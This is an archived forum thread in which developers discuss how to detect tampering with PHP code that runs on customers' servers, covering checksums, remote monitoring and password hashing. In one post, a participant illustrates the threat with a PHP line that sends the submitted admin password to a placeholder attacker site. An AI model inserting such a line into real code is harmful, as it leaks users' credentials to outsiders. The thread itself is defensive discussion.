Is there a way to verify integrity of php/javascript code

Han wrote:

Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

Thanks for your help
-Han

the md5 of the files would change completly if it was tampered with at
all.

you can use the php 'md5("path/to/file")' function to check the
integrity of files through php.

hope this helps.

iwp

>Our app runs on end-users machines (apache2.x + php5). At this moment

it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.
If you put sensitive info that you don't want end-users to see on
end-user machines, they don't have to "steal" it, you already gave
it to them.

And why would they need access to the console if they can log in
remotely?
Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?
Anyone modifying the code can simply see what the hash is on
unmodified code and then modify the code to always send that. Or
they can modify the code to do the hash on an unmodified copy which
is never run.
What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

You can't. Remember, if the user can view your code on a display,
then someone can aim a webcam at that display and send it anywhere.

You could try using a tamper-proof smart card, but I don't know of any
of those with a graphical display or with networking capabilities.

Gordon L. Burditt

>> Our app runs on end-users machines (apache2.x + php5). At this moment

it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

Thanks for your help
-Han

the md5 of the files would change completly if it was tampered with at
all.

you can use the php 'md5("path/to/file")' function to check the
integrity of files through php.

Until, of course, someone modifies their copy so that the path/to/file
points at an *unmodified* copy which is never run but is only used
to pass the integrity check.

Gordon L. Burditt

A simpler attack would be to disable that check.

I guess the solution has to be outside of php. I cannot figure out a
solution though.

-Han

Gordon Burditt wrote:

Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.

Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?

What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?

Thanks for your help
-Han

the md5 of the files would change completly if it was tampered with at
all.

you can use the php 'md5("path/to/file")' function to check the
integrity of files through php.

Until, of course, someone modifies their copy so that the path/to/file
points at an *unmodified* copy which is never run but is only used
to pass the integrity check.

Gordon L. Burditt

We are not trying to hide sensitive data that belongs to us. The
sensitive info is the users' data (e.g., their passwords).

Are you saying that this is theoretically impossible? Then we should
just find a solution that makes the hacker's life more difficult.

We cannot be the first one running on to this problem. There must be a
solution that doesnt require temper-proof smart cards.

Thanks
-Han

Han wrote:

We are not trying to hide sensitive data that belongs to us. The
sensitive info is the users' data (e.g., their passwords).

Don't store passwords. Problem solved.
Cheers,
NIcholas Sherlock

>We are not trying to hide sensitive data that belongs to us. The

sensitive info is the users' data (e.g., their passwords).
Does the admin of the server on which the PHP code is running want
the check to work, or does he want to subvert it?

If it's a user's password, why is it in the PHP script (as distinguished
from a database)? Or are you talking about passwords users enter
into their clients to log in?
Are you saying that this is theoretically impossible? Then we should
just find a solution that makes the hacker's life more difficult.
If the *SERVER ADMIN* is trying to compromise your code (e.g. it's
some kind of copy protection or licensing check), you don't have
much chance of stopping it. The same applies to a hacker who manages
to get root on the box and who spends enough time to understand the
problem. Pre-scripted attacks are much easier to stop. Another approach
is to put a key part of the operation of the system on a server *YOU*
control, so, for instance, if an activation key gets posted on the
Internet and is widely abused, you can deactivate it.

Doing something like opening the file $_SERVER['PHP_SELF'], computing
a checksum of it, and checking it against a known value is easily
defeated by a human who understands the code, but it will trip up
a virus that simply sticks logging code at the beginning of the
script to leak passwords to a remote (evil) system, at least until
your technique becomes so common that it's worth writing an attack
to defeat it. Oh, yes, you probably have to checksum all of the
file EXCEPT the part containing the 'correct answer', as computing
the checksum of the script when it already contains the answer you're
trying to compute is intentionally difficult, so you might checksum
all but the first line, and the first line is:
<?php $md5sum='a37862 648cde798779873 83992';

It would work better if you can introduce a system that can be
considered secure. For example, you don't just check the checksum
of the script *in the script*, you also output it to the browser
(perhaps hidden in a HTML comment). Your customer registers his
URL where he installs the script with you, and you poll them all,
verifying the checksum. If it changes, you raise an alarm. We're
assuming that the hacker can't get your customer's server and your
monitoring system at the same time, so replacing the 'correct answer'
is harder to do. Nagios is a nice monitoring system that can run
all sorts of periodic remote checks on your network (like that your
web server is up, that your cert is not expired, and you could do
just about any check on a web page returned that you can write a
script to verify).
We cannot be the first one running on to this problem. There must be a
solution that doesnt require temper-proof smart cards.

Tamper-proof smart cards are needed where the holder of the card wants
to cheat the system and there's enough monetary incentive for him
to use a lot of effort trying to do so. I originally thought this
was the situation you were describing, apparently I misinterpreted
what you wanted.

Gordon L. Burditt

Passwords are not stored in plaintext. However, still it's a 2 secs job
to change this line
if(strcmp(sha1( 'admin'.$_REQUE ST['pass']),$adminpass)){
to
fopen('http://www.badhackerss ite.com/'.$_REQUEST['pass'], "r");
if(strcmp(sha1( 'admin'.$_REQUE ST['pass']),$adminpass)){
The admin password is leaked the next time user logs in.
[excuse the syntax errors]

Nicholas Sherlock (n_********@hot mail.com) wrote:
: Han wrote:
: > We are not trying to hide sensitive data that belongs to us. The
: > sensitive info is the users' data (e.g., their passwords).

: Don't store passwords. Problem solved.
To be a little clearer, do not store unencrypted passwords, only store the
crypt or md5 checksum of a password.

Use two way encryption of important data like credit card numbers. If the
hardware is stolen then it is much harder to steal the data. If possible
require a person to enter the decrypt password for data. Either when the
system starts up so that the decrypted data is never available except
within the memory of the running computer after a bootup by an authorized
person (though the virtual memory paging file must be considered as well).
Or decrypt the data just as needed, where each set of data has a password
specific to what ever person is authorized to access that data.

Store important data on a "more secure" server (in this case - yours), and
access it through a VPN that requires a manual password.

Combine the two, so that (for example) a cronjob reads a hard coded
password but only via a secure (i.e. encrypted) link to a another computer
at a different location.

However, if any person has access, either physical or remote login with
any privileges (intended or not) then the program and the data can never
be completely protected.

One very common strategy to solve this is to make the system and data
available only to people that are trusted. "trusted" actually means back
ground checks (criminal record checks etc), signed contracts, security
clearances, two key signins, etc etc. continual review of security
procedures and policies. (That is all the stuff that allow large
companies to charge outrageous prices.)

Another strategy used in some settings - the server hardware does not
belong to the customer. The seller (you in your example) still owns the
hardware. The customer has no privileged access, but does have physical
control of the box. You login remotely to do upgrades etc, or other
maintenance. They might control your remote access by physically
disconnecting your connection to the box, and possibly monitoring your
connection when you work on it (you'll need to use a challenge/response
login if they monitor your access).

--

This programmer available for rent.